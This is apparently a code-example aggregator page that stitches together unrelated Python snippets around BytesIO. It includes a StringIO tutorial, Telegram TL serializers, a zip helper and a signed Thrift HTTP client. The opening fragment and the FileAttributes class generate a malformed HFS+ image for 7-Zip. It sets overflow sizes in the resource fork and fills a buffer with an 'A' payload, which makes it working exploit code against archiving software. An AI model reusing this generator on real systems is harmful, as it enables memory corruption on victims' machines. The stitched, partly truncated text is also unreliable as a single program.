    decmpfsHeader.fileSize = struct.unpack("Q", struct.pack(">Q",0x10000) )[0] 
    attributes.add("com.apple.decmpfs",decmpfsHeader,True)
    attributesData = attributes.getContent()
    attributesDataLen = len(attributesData)

    #ForkData attributesFile
    totalBlocks = attributesDataLen / header.blockSize
    totalBlocks += 1 if ( attributesDataLen % header.blockSize ) else 0
    header.attributesFile.totalBlocks = totalBlocks
    header.attributesFile.logicalSize = header.attributesFile.totalBlocks * header.blockSize
    header.attributesFile.extents[0].startBlock = forkDataOffset
    header.attributesFile.extents[0].blockCount = header.attributesFile.totalBlocks

    #increase fork offset
    forkDataOffset += header.attributesFile.totalBlocks

#endregion

#region catalog

    catalogOffset = forkDataOffset
    print("catalogOffset : ", catalogOffset)
    kHeadSize = 14
    kBasicRecSize = 0x58
    kAttrRecordType_Inline = 0x10

    NODE_SIZE = 512
    catalog = BytesIO()
    catalog.write("\x00" * NODE_SIZE)
    catalog.seek(0)

    desc = BTNodeDescriptor() # any, 7zip does not parse it
    memset(addressof(desc),0x42,sizeof(desc))
    catalog.write(desc)

    hr   = BTHeaderRec()
    hr.firstLeafNode = 1
    hr.nodeSize = NODE_SIZE # sizeLog
    hr.totalNodes = 2        
    catalog.write(hr)

    #align
    catalog.seek( NODE_SIZE )

    #Create Node
    catalogNode = BytesIO()
    catalogNode.write( "\x00" * NODE_SIZE )
    catalogNode.seek(0)
    desc = BTNodeDescriptor()    
    desc.numRecords = 1
    desc.kind = 0xFF #nodeType_leaf
    desc.fLink = 0
    catalogNode.write(desc)
    
    data = CatalogHeaderData()
    keyString = "icewall"
    data.nameLen = len(keyString)
    data.parentID = 0x11223344
    data.keyLen = data.nameLen * 2 + 6
    catalogNode.write(data)
    catalogNode.write( unicode(keyString).encode("utf-16be") )    

    RECORD_TYPE_FILE = 2 
    item = CatalogFile()
    item.recordType = RECORD_TYPE_FILE
    item.fileID = 0x31337
    #data fork
    item.dataFork.logicalSize = 0
    item.dataFork.totalBlocks = 0
    item.dataFork.extents[0].startBlock = 0
    item.dataFork.extents[0].blockCount = 0

    totalBlocks = OVERFLOW_VALUE / header.blockSize
    totalBlocks += 1 if ( OVERFLOW_VALUE % header.blockSize ) else 0
    print ("resource fork total blocks : 0x%x" % totalBlocks)
    #resource fork    
    item.resourceFork.totalBlocks = totalBlocks
    item.resourceFork.logicalSize = item.resourceFork.totalBlocks * header.blockSize
    item.resourceFork.extents[0].startBlock = catalogOffset + 1# just after catalog
    item.resourceFork.extents[0].blockCount = totalBlocks
    catalogNode.write(item)

    #offsets: 7zip derives each record's size from the difference between
    #consecutive record offsets, so at least two offsets must be present
    nodeDataOffset = sizeof(desc)
    offsets = struct.pack(">H", nodeDataOffset + kBasicRecSize + 22 + 0x50 * 2)  #offsetNext
    offsets += struct.pack(">H",nodeDataOffset) #offset
    catalogNode.seek(hr.nodeSize - len(offsets))
    catalogNode.write(offsets)    
    catalogNode.seek(0)
    catalog.write(  catalogNode.read() )
    catalog.seek( 0 )
    catalogData = catalog.read()

    header.catalogFile.totalBlocks = 1 #FIXED!!! remember
    header.catalogFile.logicalSize = header.catalogFile.totalBlocks * header.blockSize
    header.catalogFile.extents[0].startBlock = forkDataOffset
    header.catalogFile.extents[0].blockCount = header.catalogFile.totalBlocks

    forkDataOffset += header.catalogFile.totalBlocks

#endregion

#region resource

    #resource fork data    
    resourceOffset = forkDataOffset
    print("resource : ",resourceOffset)
    kHeaderSize = 0x100
    resourceFork = BytesIO()
    resourceFork.write("\x00" * kHeaderSize)
    resourceFork.seek(0)

    numBlocks = 2
    dataSize2 = OVERFLOW_VALUE + 0x20 #value used to overflow
    mapSize  = 50 
    mapPos   = item.resourceFork.logicalSize - mapSize
    dataSize = dataSize2 + 4
    dataPos  = mapPos - dataSize       
    print("mapSize : 0x%x\nmapPos : 0x%x\ndataSize : 0x%x\ndataPos : 0x%x\nitem.resourceFork.logicalSize : 0x%x" % (mapSize,mapPos,dataSize,dataPos,item.resourceFork.logicalSize) )
    resourceFork.write( struct.pack(">I",dataPos) ) # dataPos
    resourceFork.write( struct.pack(">I", mapPos) )# mapPos
    resourceFork.write( struct.pack(">I",dataSize) ) # dataSize
    resourceFork.write( struct.pack(">I",mapSize) ) # mapSize    
    #offset + 256    
    resourceFork.seek(kHeaderSize) 
    resourceFork.write(struct.pack(">I",dataSize2) )
    resourceFork.write(struct.pack("<I",numBlocks) )
    #table
    size1 = OVERFLOW_VALUE 
    offset1 = (numBlocks << 3) + 4
    offset2 = size1 + offset1
    size2 =  dataSize2 - offset2
    resourceFork.write(struct.pack("<I",offset1) )
    resourceFork.write(struct.pack("<I",size1) )
    resourceFork.write(struct.pack("<I",offset2) )
    resourceFork.write(struct.pack("<I",size2) )
    resourceFork.write("\x0F") # just to quickly end function
    resourceFork.write("A"*(size1-1)) #payload
    resourceFork.write("B"*0x20000) #additional data
    resourceFork.seek(0)
    resourceData = resourceFork.read()

#endregion

    #Write 7zip header
    header.totalBlocks = header.attributesFile.totalBlocks + header.catalogFile.totalBlocks + item.resourceFork.totalBlocks     
    hfs.write("\x00" * (header.blockSize * header.totalBlocks) ) # just to make space for everything
    hfs.seek(0x400) # 7zip requires that space
    hfs.write(header)

    hfs.seek(attributesOffset * header.blockSize)
    hfs.write(attributesData)

    hfs.seek(catalogOffset * header.blockSize)
    hfs.write(catalogData)

    hfs.seek(resourceOffset * header.blockSize)
    hfs.write(resourceData)
    
    hfs.seek(0)

    fw.write(hfs.read())
    fw.close()
Exemple #55
0
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 12 08:51:35 2017
@author: shuai.qian
"""
from io import StringIO, BytesIO

f = StringIO()
f.write('hello')
f.write(' world!')
print(f.getvalue())

sio = StringIO('Hello!\nHi!\nGoodbye!')
while True:
    s = sio.readline()
    if s == '':
        break
    print(s.strip())
bio = BytesIO()
bio.write('中文'.encode('utf-8'))
print(bio.getvalue())
bio.seek(0)  # rewind before read(): otherwise the position is at the end and read() returns b''
print(bio.read())
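# A minimal illustration of why the seek matters: read() is position-dependent,
# getvalue() is not.
buf = BytesIO(b'abc')
print(buf.read(1))     # b'a' -- read() advances the position
print(buf.getvalue())  # b'abc' -- getvalue() ignores the position
print(buf.read())      # b'bc' -- continues where read(1) stopped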
Exemple #56
0
class FileAttributes(object):    

    NODE_SIZE = 512

    def __init__(self):
        self.__offset = 0
        self.__content = BytesIO()
        # alignment
        self.__content.write(b"\x00" * FileAttributes.NODE_SIZE)
        self.__content.seek(0)
        ####
        desc = BTNodeDescriptor()  # contents are arbitrary; 7zip does not parse this descriptor
        memset(addressof(desc), 0x41, sizeof(desc))
        self.__content.write(desc)
        ###
        self.__hr   = BTHeaderRec()
        self.__hr.firstLeafNode = 1
        self.__hr.nodeSize = FileAttributes.NODE_SIZE # sizeLog    
        self.__hr.totalNodes = 1 
        self.__content.write(self.__hr)
        
        #align to node size
        self.__content.seek(FileAttributes.NODE_SIZE)

    def add(self, name, itemData = None, last = False):
        #constants
        kHeadSize = 14
        kRecordHeaderSize = 16
        kAttrRecordType_Inline = 0x10

        #Space & add new node
        self.__hr.totalNodes += 1
        
        #Create Node
        node = BytesIO()
        node.write("\x00" * FileAttributes.NODE_SIZE)
        node.seek(0)

        #NODE #1    
        desc = BTNodeDescriptor()
        desc.numRecords = 1
        desc.kind = 0xFF #nodeType_leaf
        if last:
            desc.fLink = 0        
        else:
            desc.fLink = self.__hr.totalNodes
        node.write(desc)

        nodeDataOffset = sizeof(desc)    

        #data
        data = AttrHeaderData()
        keyString  = name   
        data.fileID = 0x31337 if itemData else 0xdeadbeef
        data.startBlock = 0
        data.nameLen = len(keyString)
        data.keyLen = kHeadSize - 2 + data.nameLen * 2
        node.write(data)

        # name string, UTF-16BE (use unicode(keyString) here under Python 2)
        node.write(keyString.encode("utf-16be"))

        record = AttrHeaderRecord()
        record.recordType = kAttrRecordType_Inline
        record.dataSize = 16
        node.write(record)
        
        #itemData
        if itemData:
            node.write(itemData)

        # offsets
        # offsetNext: 7zip derives each record's size from the difference between
        # consecutive record offsets, so at least two offsets must be present
        offsets = struct.pack(">H", nodeDataOffset + kHeadSize + kRecordHeaderSize + data.keyLen + record.dataSize)
        offsets += struct.pack(">H", nodeDataOffset)  # offset of the record itself
        node.seek(FileAttributes.NODE_SIZE - len(offsets))
        node.write(offsets)
        
        #add to rest of attributes
        node.seek(0)
        self.__content.write( node.read() )

    def getContent(self):
        #update content first
        self.__content.seek( sizeof(BTNodeDescriptor()) )
        self.__content.write( self.__hr )
        self.__content.seek(0)
        return self.__content.read()
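# A possible usage sketch. The attribute names and payload below are
# hypothetical; BTNodeDescriptor, BTHeaderRec, AttrHeaderData and
# AttrHeaderRecord are the ctypes structures defined elsewhere in this script.
attrs = FileAttributes()
attrs.add("com.apple.decmpfs", itemData=b"\x41" * 16)  # 16 bytes matches record.dataSize
attrs.add("com.apple.dummy", last=True)                # last node gets fLink = 0
attributesData = attrs.getContent()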
Exemple #57
0
    def write(self) -> bytes:
        b = BytesIO()
        b.write(Int(self.ID, False))

        flags = 0
        flags |= (1 << 3) if self.can_view_participants is not None else 0
        flags |= (1 << 6) if self.can_set_username is not None else 0
        flags |= (1 << 7) if self.can_set_stickers is not None else 0
        flags |= (1 << 10) if self.hidden_prehistory is not None else 0
        flags |= (1 << 12) if self.can_view_stats is not None else 0
        flags |= (1 << 0) if self.participants_count is not None else 0
        flags |= (1 << 1) if self.admins_count is not None else 0
        flags |= (1 << 2) if self.kicked_count is not None else 0
        flags |= (1 << 2) if self.banned_count is not None else 0
        flags |= (1 << 13) if self.online_count is not None else 0
        flags |= (1 << 4) if self.migrated_from_chat_id is not None else 0
        flags |= (1 << 4) if self.migrated_from_max_id is not None else 0
        flags |= (1 << 5) if self.pinned_msg_id is not None else 0
        flags |= (1 << 8) if self.stickerset is not None else 0
        flags |= (1 << 9) if self.available_min_id is not None else 0
        b.write(Int(flags))

        b.write(Int(self.id))

        b.write(String(self.about))

        if self.participants_count is not None:
            b.write(Int(self.participants_count))

        if self.admins_count is not None:
            b.write(Int(self.admins_count))

        if self.kicked_count is not None:
            b.write(Int(self.kicked_count))

        if self.banned_count is not None:
            b.write(Int(self.banned_count))

        if self.online_count is not None:
            b.write(Int(self.online_count))

        b.write(Int(self.read_inbox_max_id))

        b.write(Int(self.read_outbox_max_id))

        b.write(Int(self.unread_count))

        b.write(self.chat_photo.write())

        b.write(self.notify_settings.write())

        b.write(self.exported_invite.write())

        b.write(Vector(self.bot_info))

        if self.migrated_from_chat_id is not None:
            b.write(Int(self.migrated_from_chat_id))

        if self.migrated_from_max_id is not None:
            b.write(Int(self.migrated_from_max_id))

        if self.pinned_msg_id is not None:
            b.write(Int(self.pinned_msg_id))

        if self.stickerset is not None:
            b.write(self.stickerset.write())

        if self.available_min_id is not None:
            b.write(Int(self.available_min_id))

        return b.getvalue()
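    # For context, the matching read side of a TL type consumes fields in
    # exactly the order write() emits them, checking the same flag bits first.
    # A minimal sketch of the pattern (not the generated code; Int/String are
    # the same primitives used in write() above):
    #
    #   flags = Int.read(b)
    #   participants_count = Int.read(b) if flags & (1 << 0) else None
    #   admins_count = Int.read(b) if flags & (1 << 1) else None
    #   ...and so on for each optional field.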
Exemple #58
0
class Ziper(object):
    def __init__(self, raw_file_content=None):
        # Create the in-memory file-like object
        self.in_memory_zip = BytesIO()
        if raw_file_content:
            self.in_memory_zip.write(raw_file_content)

    def add(self, filename_in_zip, file_contents):
        """Appends a file with name filename_in_zip and contents of
        file_contents to the in-memory zip."""
        # Get a handle to the in-memory zip in append mode
        zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED,
                             False)
        # if the file already exists in the archive, replace it
        if filename_in_zip in zf.namelist():
            # create a temporary directory to hold the extracted files
            tmp_zip_path_name = uuid.uuid4()
            tmp_zip_path = '/tmp/%s' % tmp_zip_path_name
            os.makedirs(tmp_zip_path)
            new_zip_path = None
            try:
                # extract everything except the file being replaced
                for item in zf.namelist():
                    if not item == filename_in_zip:
                        zf.extract(item, tmp_zip_path)

                # write the replacement contents over the extracted file
                with open(os.path.join(tmp_zip_path, filename_in_zip),
                          'w') as adding_file:
                    adding_file.write(file_contents)

                # build a new zip archive
                new_zip_path = tmp_zip_path + '.zip'
                new_zip_file = zipfile.ZipFile(new_zip_path, 'w',
                                               zipfile.ZIP_DEFLATED)
                # re-compress the contents of the temp directory
                pre_len = len(tmp_zip_path)
                for dirpath, dirnames, filenames in os.walk(tmp_zip_path):
                    for filename in filenames:
                        pathfile = os.path.join(dirpath, filename)
                        arcname = pathfile[pre_len:].strip(os.path.sep)
                        new_zip_file.write(pathfile, arcname)
                new_zip_file.close()
                # read the new archive back into memory
                with open(new_zip_path, 'rb') as nzf:
                    self.in_memory_zip = BytesIO()
                    self.in_memory_zip.write(nzf.read())
            except Exception as e:
                raise e
            finally:
                # remove the temp directory and the new archive file
                shutil.rmtree(tmp_zip_path)
                if new_zip_path:
                    os.remove(new_zip_path)
        else:
            zf.writestr(filename_in_zip, file_contents)
            # Mark the files as having been created on Windows so that
            # Unix permissions are not inferred as 0000
            for zfile in zf.filelist:
                zfile.create_system = 0
            zf.close()  # flush the central directory so read() returns a valid zip
        return self

    def read(self):
        """Returns a string with the contents of the in-memory zip."""
        self.in_memory_zip.seek(0)
        return self.in_memory_zip.read()

    def write_to_file(self, filename):
        """Writes the in-memory zip to a file."""
        with open(filename, "wb") as f:
            f.write(self.read())

    def read_file(self, filename):
        zf = zipfile.ZipFile(self.in_memory_zip, "r")
        return zf.open(filename)
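# A possible usage sketch (file names and output path are hypothetical):
z = Ziper()
z.add("hello.txt", "hello world")       # plain append
z.add("hello.txt", "updated contents")  # same name: exercises the rebuild path
z.write_to_file("/tmp/demo.zip")
print(z.read_file("hello.txt").read())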
Exemple #59
0
class THttpClient(TTransportBase):
    """Http implementation of TTransport base for EMQ."""
    def __init__(self,
                 credential,
                 uri_or_host,
                 timeout=None,
                 thrift_protocol=ThriftProtocol.TBINARY):
        self.credential = credential
        parsed = urlparse(uri_or_host)
        self.scheme = parsed.scheme
        assert self.scheme in ('http', 'https')
        if self.scheme == 'http':
            self.port = parsed.port or http.client.HTTP_PORT
        elif self.scheme == 'https':
            self.port = parsed.port or http.client.HTTPS_PORT
        self.host = parsed.hostname
        self.path = parsed.path
        if parsed.query:
            self.path += '?%s' % parsed.query
        self.__timeout = timeout
        self.__protocol = thrift_protocol
        self.__wbuf = BytesIO()
        self.__http = None
        self.__custom_headers = None
        self.__clock_offset = 0

    def open(self):
        if self.scheme == 'http':
            self.__http = http.client.HTTPConnection(self.host, self.port)
        else:
            self.__http = http.client.HTTPSConnection(self.host, self.port)

    def close(self):
        self.__http.close()
        self.__http = None

    def isOpen(self):
        return self.__http is not None

    def setTimeout(self, ms):
        if not hasattr(socket, 'getdefaulttimeout'):
            raise NotImplementedError

        if ms is None:
            self.__timeout = None
        else:
            self.__timeout = ms / 1000.0

    def setCustomHeaders(self, headers):
        self.__custom_headers = headers

    def read(self, sz):
        return self.__response.read(sz)

    def write(self, buf):
        self.__wbuf.write(buf)

    def __withTimeout(f):
        def _f(*args, **kwargs):
            orig_timeout = socket.getdefaulttimeout()
            socket.setdefaulttimeout(args[0].__timeout)
            try:
                return f(*args, **kwargs)
            finally:
                # restore the previous default timeout even if the call raises
                socket.setdefaulttimeout(orig_timeout)

        return _f

    def flush(self):
        if self.isOpen():
            self.close()
        self.open()

        # Pull data out of buffer
        data = self.__wbuf.getvalue()
        self.__wbuf = BytesIO()

        # HTTP request
        self.__http.putrequest('POST', self.path)

        # Write headers
        headers = self.__set_headers(data)

        default_user_agent = 'Python/THttpClient'
        if not self.__custom_headers or USER_AGENT not in self.__custom_headers:
            user_agent = default_user_agent
            script = os.path.basename(sys.argv[0])
            if script:
                user_agent = '%s (%s)' % (user_agent,
                                          urllib.parse.quote(script))
            self.__http.putheader(USER_AGENT, user_agent)

        # __custom_headers may be None; fall back to an empty dict
        for key, val in self.__auth_headers(
                dict(
                    list(headers.items()) +
                    list((self.__custom_headers or {}).items()))).items():
            self.__http.putheader(key, val)

        self.__http.endheaders()

        # Write payload
        self.__http.send(data)

        # Get reply to flush the request
        self.__response = self.__http.getresponse()
        res = self.__response
        # print "http get reply is:%s" % self.__http.getreply
        code = self.__response.status
        if code != 200:
            raise Exception(res.reason + '\n' + res.read().decode('utf-8'))

    # Decorate if we know how to timeout
    if hasattr(socket, 'getdefaulttimeout'):
        flush = __withTimeout(flush)

    def __auth_headers(self, headers):
        string_to_assign = str()
        string_to_assign += '%s\n' % 'POST'
        string_to_assign += '%s\n' % headers[CONTENT_MD5]
        string_to_assign += '%s\n' % headers[CONTENT_TYPE]
        string_to_assign += '\n'
        string_to_assign += '%s' % self.__canonicalize_xiaomi_headers(headers)
        string_to_assign += '%s' % self.__canonicalize_resource(self.path)
        signature = \
            base64.b64encode(hmac.new(self.credential.secretKey.encode('utf-8'), string_to_assign.encode('utf-8'),
                                         digestmod=sha1).digest()).strip().decode("utf-8")
        auth_string = "Galaxy-V2 %s:%s" % (self.credential.secretKeyId,
                                           signature)
        headers[AUTHORIZATION] = auth_string

        return headers

    def __set_headers(self, body):
        headers = dict()
        headers[HOST] = self.host
        headers[CONTENT_LENGTH] = str(len(body))
        headers[TIMESTAMP] = str(int(time.time() + self.__clock_offset))
        headers[CONTENT_MD5] = hashlib.md5(body).hexdigest()
        headers[CONTENT_TYPE] = THRIFT_HEADER_MAP[self.__protocol]
        headers[MI_DATE] = email.utils.formatdate(time.time())
        return headers

    def __canonicalize_xiaomi_headers(self, http_headers):
        if http_headers is None or len(http_headers) == 0:
            return ''

        canonicalized_headers = dict()
        for key in http_headers:
            lower_key = key.lower()
            try:
                lower_key = lower_key.decode('utf-8')
            except AttributeError:
                pass  # already a str under Python 3

            if http_headers[key] and lower_key.startswith(
                    XIAOMI_HEADER_PREFIX):
                if type(http_headers[key]) != str:
                    canonicalized_headers[lower_key] = str()
                    i = 0
                    for k in http_headers[key]:
                        canonicalized_headers[lower_key] += '%s' % (k.strip())
                        i += 1
                        if i < len(http_headers[key]):
                            canonicalized_headers[lower_key] += ','
                else:
                    canonicalized_headers[lower_key] = http_headers[key].strip()

        result = ""
        for key in sorted(canonicalized_headers.keys()):
            values = canonicalized_headers[key]
            result += '%s:%s\n' % (key, values)
        return result

    def __canonicalize_resource(self, uri):
        result = ""
        parsed_url = urlparse(uri)
        result += '%s' % parsed_url.path
        query_args = parsed_url.query.split('&')

        i = 0
        for query in sorted(query_args):
            key = query.split('=')
            if key[0] in SubResource.get_all_subresource():
                if i == 0:
                    result += '?'
                else:
                    result += '&'
                if len(key) == 1:
                    result += '%s' % key[0]
                else:
                    result += '%s=%s' % (key[0], key[1])
                i += 1
        return result
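# A possible wiring sketch (the endpoint URL, credential object and generated
# service stub are assumptions, not part of this class):
#
#   transport = THttpClient(credential, "https://emq.api.xiaomi.com/v1/api",
#                           timeout=10000)
#   protocol = TBinaryProtocol.TBinaryProtocol(transport)   # from thrift
#   client = MessageService.Client(protocol)                # hypothetical stub
#   transport.open()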
Exemple #60
0
    def write(self) -> bytes:
        data = BytesIO()
        data.write(Int(self.ID, False))

        # No flags

        data.write(Vector(self.new_messages))

        data.write(Vector(self.new_encrypted_messages))

        data.write(Vector(self.other_updates))

        data.write(Vector(self.chats))

        data.write(Vector(self.users))

        data.write(self.intermediate_state.write())

        return data.getvalue()